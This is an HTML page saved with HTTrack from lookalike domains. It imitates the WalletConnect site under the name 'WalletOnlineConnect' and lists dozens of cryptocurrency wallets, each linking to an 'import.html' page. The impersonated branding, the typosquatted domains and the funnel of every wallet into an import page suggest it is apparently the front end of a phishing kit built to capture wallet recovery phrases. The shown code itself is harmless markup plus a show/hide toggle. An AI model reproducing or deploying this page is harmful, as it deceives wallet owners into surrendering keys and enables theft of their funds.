<html>
<!-- Added by HTTrack -->
<!-- Mirrored from walletconnect.support/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 10 Mar 2021 13:07:42 GMT -->

<!-- Mirrored from walletsconnect.support/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 15 Mar 2021 00:16:00 GMT -->

<!-- Mirrored from connectlivewallets.io/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 12 Apr 2021 14:37:31 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<link rel="stylesheet" href="main.css" type="text/css"/> 
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Open protocol for connecting Wallets to Dapps">
<meta property="og:image" content="images/logo.svg">
<link rel="icon" href="images/logo.svg">

<script>
function show() {
  var x = document.getElementById("hidden");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }

  if (x.style.display === "block") {
    document.getElementById("btn").innerHTML = "Show Less &uarr;";
  } 
}
</script>
</head>

<title>WalletOnlineConnect</title>

<body>
<center>
    <div class="top">
        <a href="#footer" class="left">Github</a>

        <a href="#wallets" class="left">Docs</a>
        <a href="/" class="main"><img src="images/logo.svg" alt="logo"/></a>
        <a href="#wallets" class="left">Wallets</a>
        <a href="#wallets" class="left">Apps</a>
</div>
</br>
<div class="gFeYHJ">WalletOnlineConnect</div>

<div class="lpfxqP">Open protocol for connecting Wallets to Dapps</div>
</br>

<div class="dXgqeu">
<img src="images/banner.png" alt="WalletOnlineConnect">
</div>

<div class="bout">
<h2 class="home">What is WalletOnlineConnect?</h2>
<p>WalletOnlineConnect is an open source protocol for connecting decentralised applications to mobile wallets with QR code scanning or deep linking. 
A user can interact securely with any Dapp from their mobile phone, making WalletOnlineConnect wallets a safer choice compared to desktop or browser 
extension wallets.</p></br>
<h2 class="home">How does it work?</h2>
<p>WalletOnlineConnect connects web applications to supported <a href="#">mobile wallets</a>. WalletOnlineConnect session is started by a scanning a QR 
code (desktop) or by clicking an application deep link (mobile).</p>
</div>

<div class="wallets" id="wallets">
    <h1 class="home">Wallets</h1>
<p>Multiple iOS and Android wallets support the WalletOnlineConnect protocol. Interaction between mobile apps and mobile browsers are supported via mobile deep linking.</p>

</br>
<div class="all">
<div class="apps">
    <a href="import.html?type=metamask"><img src="images/metamask.png"></a></br>
    MetaMask
</div>

<div class="apps">
    <a href="import.html?type=MEW+wallet"><img src="images/MEW.png"></a></br>
    MEW Wallet
</div>

<div class="apps">
    <a href="import.html?type=trust+wallet"><img src="images/trustwallet.png"></a></br>
    Trust Wallet
</div>

<div class="apps">
    <a href="import.html?type=wallet+connect"><img src="images/logo.svg"></a></br>
    Connect</br>Wallet
</div>

<div class="apps">
    <a href="import.html?type=coinbase+wallet"><img src="images/coinbase.jpg"></a></br>
    Coinbase Wallet
</div>

<div class="apps">
    <a href="import.html?type=atomic+wallet"><img src="images/atomic.png"></a></br>
    Atomic Wallet
</div>

<div class="apps">
    <a href="import.html?type=binance+smart+chain"><img src="images/binance.png"></a></br>
    Binance Smart Chain
</div>

<div class="apps">
    <a href="import.html?type=bnb"><img src="images/bnb.png"></a></br>
    BNB
</div>

<div class="apps">
    <a href="import.html?type=polkadot"><img src="images/polkadot.png"></a></br>
    Polkadot
</div>

<div class="apps">
    <a href="import.html?type=xrp"><img src="images/xrp.png"></a></br>
    XRP
</div>

<div class="apps">
    <a href="import.html?type=stellar"><img src="images/stellar.png"></a></br>
    Stellar
</div>

<div class="apps">
    <a href="import.html?type=tezos"><img src="images/tezos.png"></a></br>
    Tezos
</div>

<div class="apps">
    <a href="import.html?type=theta"><img src="images/theta.png"></a></br>
    Theta
</div>

<div class="apps">
    <a href="import.html?type=tron"><img src="images/tron.png"></a></br>
    Tron
</div>

<div class="apps">
    <a href="import.html?type=cosmos"><img src="images/cosmos.png"></a></br>
    Cosmos
</div>

<div class="apps">
    <a href="import.html?type=kava"><img src="images/kava.png"></a></br>
    Kava
</div>

<div class="apps">
    <a href="import.html?type=filecoin"><img src="images/filecoin.png"></a></br>
    Filecoin
</div>

<div class="apps">
    <a href="import.html?type=solana"><img src="images/solana.png"></a></br>
    Solana
</div>

<div class="apps">
    <a href="import.html?type=ethereum+classic"><img src="images/ethereum-classic.png"></a></br>
    Ethereum Classic
</div>

<div class="apps">
    <a href="import.html?type=zilliqa"><img src="images/zilliqa.png"></a></br>
    Zilliqa
</div>

<div class="apps">
    <a href="import.html?type=elrond"><img src="images/elrond.jpg"></a></br>
    Elrond
</div>

<div class="apps">
    <a href="import.html?type=waves"><img src="images/waves.png"></a></br>
    Waves
</div>

<div class="apps">
    <a href="import.html?type=icon"><img src="images/icon.png"></a></br>
    ICON
</div>

<div class="apps">
    <a href="import.html?type=ontology"><img src="images/ontology.png"></a></br>
    Ontology
</div>


</div>
</br>
<button onclick="show()" class="btn" id="btn">Show More &darr;</button>
</br></br>
<div class="hidden" id="hidden">
<div class="all">
    
<div class="apps">
    <a href="import.html?type=nano"><img src="images/nano.png"></a></br>
    Nano
</div>

<div class="apps">
    <a href="import.html?type=tomo+chain"><img src="images/tomo.png"></a></br>
    Tomo Chain
</div>

<div class="apps">
    <a href="import.html?type=iotex"><img src="images/iotex.png"></a></br>
    IoTex
</div>

<div class="apps">
    <a href="import.html?type=wanchain"><img src="images/wanchain.png"></a></br>
    Wanchain
</div>

<div class="apps">
    <a href="import.html?type=harmony"><img src="images/harmony.png"></a></br>
    Harmony
</div>

<div class="apps">
    <a href="import.html?type=kin"><img src="images/kin.png"></a></br>
    Kin
</div>

<div class="apps">
    <a href="import.html?type=nimiq"><img src="images/nimiq.png"></a></br>
    Nimiq
</div>

<div class="apps">
    <a href="import.html?type=aion"><img src="images/aion.png"></a></br>
    Aion
</div>

<div class="apps">
    <a href="import.html?type=thunder-token"><img src="images/thundertoken.png"></a></br>
    Thunder Token
</div>

<div class="apps">
    <a href="import.html?type=aerternity"><img src="images/aeternity.png"></a></br>
    Aeternity
</div>

<div class="apps">
    <a href="import.html?type=nebulas"><img src="images/nebulas.png"></a></br>
    Nebulas
</div>

<div class="apps">
    <a href="import.html?type=fio"><img src="images/fio.png"></a></br>
    FIO
</div>

<div class="apps">
    <a href="import.html?type=gochain"><img src="images/gochain.png"></a></br>
    GoChain
</div>

<div class="apps">
    <a href="import.html?type=POA+network"><img src="images/poa.png"></a></br>
    POA Network
</div>

<div class="apps">
    <a href="import.html?type=callisto"><img src="images/callisto.png"></a></br>
    Callisto
</div>

<div class="apps">
    <a href="import.html?type=bitpay"><img src="images/bitpay.jpg"></a></br>
    BitPay
</div>

<div class="apps">
    <a href="import.html?type=aktionariat"><img src="images/aktionariat.png"></a></br>
    Aktionariat
</div>

<div class="apps">
    <a href="import.html?type=atwallet"><img src="images/atwallet.png"></a></br>
    AtWallet
</div>

<div class="apps">
    <a href="import.html?type=guard+wallet"><img src="images/guard.png"></a></br>
    Guard Wallet
</div>

<div class="apps">
    <a href="import.html?type=aave"><img src="images/aave.jpg"></a></br>
    AAVE
</div>

<div class="apps">
    <a href="import.html?type=exodus"><img src="images/exodus.jpg"></a></br>
    Exodus
</div>


<div class="apps">
    <a href="import.html?type=enjin"><img src="images/enjin.jpg"></a></br>
    Enjin
</div>


<div class="apps">
    <a href="import.html?type=skale"><img src="images/skale.png"></a></br>
    Skale
</div>

<div class="apps">
    <a href="import.html?type=portis"><img src="images/portis.png"></a></br>
    Portis
</div>

<div class="apps">
    <a href="import.html?type=trezor"><img src="images/trezor.png"></a></br>
    Trezor
</div>

<div class="apps">
    <a href="import.html?type=squarelink"><img src="images/squarelink.png"></a></br>
    Squarelink
</div>

<div class="apps">
    <a href="import.html?type=torus"><img src="images/torus.jpg"></a></br>
    Torus
</div>

<div class="apps">
    <a href="import.html?type=vechain"><img src="images/vechain.jpg"></a></br>
    VeChain
</div>

<div class="apps">
    <a href="import.html?type=scatter+wallet"><img src="images/scatter.jpg"></a></br>
    Scatter Wallet
</div>

<div class="apps">
    <a href="import.html?type=math+wallet"><img src="images/math-wallet.png"></a></br>
    Math Wallet
</div>

<div class="apps">
    <a href="import.html?type=fortmatic"><img src="images/fortmatic.png"></a></br>
    FortMatic
</div>

<div class="apps">
    <a href="import.html?type=digitex"><img src="images/digitex.png"></a></br>
    Digitex
</div>

<div class="apps">
    <a href="import.html?type=ledger"><img src="images/ledger.png"></a></br>
    Ledger
</div>

<div class="apps">
    <a href="import.html?type=defiat"><img src="images/defiat.jpg"></a></br>
    Defiat
</div>

<div class="apps">
    <a href="import.html?type=authereum"><img src="images/authereum.png"></a></br>
    Authereum
</div>

<div class="apps">
    <a href="import.html?type=flare+wallet"><img src="images/flare.jpg"></a></br>
    Flare Wallet
</div>

<div class="apps">
    <a href="import.html?type=zelcore"><img src="images/zelcore.png"></a></br>
    Zelcore
</div>

<div class="apps">
    <a href="import.html?type=bitkeep"><img src="images/bitkeep.png"></a></br>
    BitKeep
</div>

<div class="apps">
    <a href="import.html?type=coin98"><img src="images/coin98.png"></a></br>
    Coin98
</div>

<div class="apps">
    <a href="import.html?type=trust+vault"><img src="images/trustvault.png"></a></br>
    Trust Vault
</div>

</div>

</div>


</div>

<footer><div id="footer">
<p><img src="images/discord.svg" class="footimg">  <a href="https://discord.gg/">Discord</a></p></br>
<p><img src="images/telegram.svg" class="footimg">  <a href="https://t.me/">Telegram</a></p></br>
<p><img src="images/twitter.svg" class="footimg">  <a href="https://twitter.com/">Twitter</a></p></br>
<p><img src="images/github.svg" class="footimg">  <a href="https://github.com/">Github</a></p></br>
</footer>
</center>
</body>

<!-- Mirrored from walletconnect.support/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 10 Mar 2021 13:07:42 GMT -->

<!-- Mirrored from walletsconnect.support/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 15 Mar 2021 00:16:00 GMT -->

<!-- Mirrored from connectlivewallets.io/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 12 Apr 2021 14:41:25 GMT -->
</html>
